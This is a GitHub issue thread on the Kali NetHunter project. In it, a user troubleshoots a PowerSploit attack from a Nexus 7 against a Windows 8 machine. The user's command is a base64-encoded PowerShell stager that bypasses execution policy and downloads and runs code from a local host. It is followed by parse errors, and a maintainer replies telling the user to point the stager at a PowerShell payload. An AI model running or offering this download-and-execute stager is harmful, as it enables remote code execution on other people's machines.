### ISSUE TITLE
Powersploit Error (Windows 8)

### ISSUE THREAD

**Issue by pokeswap** [offensive-security/kali-nethunter#142]
When I connect Nexus 7 2013 Nethunter to computer and run Powersploit, I get error. Here is the CMD:
Microsoft Windows [Version 6.2.9200]
(c) 2012 Microsoft Corporation. All rights reserved.

C:\Users\Downstairs> PowerShell.exe -Exec ByPass -Nol -Enc IABpAGUAeAAgACgATgBlA
HcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvA
GEAZABTAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMAAuADEANQAvA
GwAbwBnAGkAbgAuAGUAeABlACIAKQAKAAoA
iex : At line:5 char:91
+ ... Agù£l☻w ééQ§ 9a)☻A ∟
+                    ~
Unexpected token ')' in expression or statement.
At line:24 char:19
+ ú☻<EAé▼¶ÑƒúO⌂§¶D@,};¥♣¶D|«d   ë¶á7Å  _@3A[<å]o%↔¶O@ A#,  è♫☺ o?§L+!$Rèr(¡ _^3
_[< ...
+                   ~
Unexpected token '}' in expression or statement.
At line:28 char:25
+ b↨A§,A ¡^☻A Sf<5dE@ ?%
+                         ~
Missing closing ')' in expression.
At line:33 char:8
+ ?AAM.Éo&<
+        ~
Ampersand not allowed. The & operator is reserved for future use; use "&" to
pass ampersand as a string.
At line:42 char:157
+ ... =☼:A %5A♂A %=Ä♂@ t←TN âOB☼ [Pè²T  ♥|‼x%Eì    Ud↨♫Ç
+                    ~~~~
Unrecognized token in source text.
At line:43 char:16
+ ìÿÿÿÿÇ▬dÿÿÿ⌂h» @ Sÿä`då ¡↑(@ ƒ☻ö.A013ÿ<
+                ~
Unrecognized token in source text.
At line:43 char:28
+ ìÿÿÿÿÇ▬dÿÿÿ⌂h» @ Sÿä`då ¡↑(@ ƒ☻ö.A013ÿ<
+                            ~
Unrecognized token in source text.
At line:43 char:42
+ ìÿÿÿÿÇ▬dÿÿÿ⌂h» @ Sÿä`då ¡↑(@ ƒ☻ö.A013ÿ<
+                                          ~
Missing closing ')' in expression.
At line:45 char:13
+ ↑D@x?Lè%Mü<ß,D@t?EüR<§gDf P¡o-A Q⌂+èƒG  .At♫PhèA@ è¶☻  ƒÄ§<E}EAu
+             ~
Missing argument in parameter list.
At line:45 char:61
+ ↑D@x?Lè%Mü<ß,D@t?EüR<§gDf P¡o-A Q⌂+èƒG  .At♫PhèA@ è¶☻  ƒÄ§<E}EAu
+                                                             ~
Unexpected token '}' in expression or statement.
Not all parse errors were reported.  Correct the reported errors and try again.
At line:1 char:2
+  iex (New-Object
Net.WebClient).DownloadString("http://192.168.0.15/login.exe")
+
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ParserError: (:) [Invoke-Expression], ParseExcep
   tion
    + FullyQualifiedErrorId : UnexpectedToken,Microsoft.PowerShell.Commands.In
   vokeExpressionCommand

**Comment by offensive-security** [comment]
the payload URL should be a powersploit powershell payload, not a binary executable. Check the default payload in the chroot @ /var/www/payload
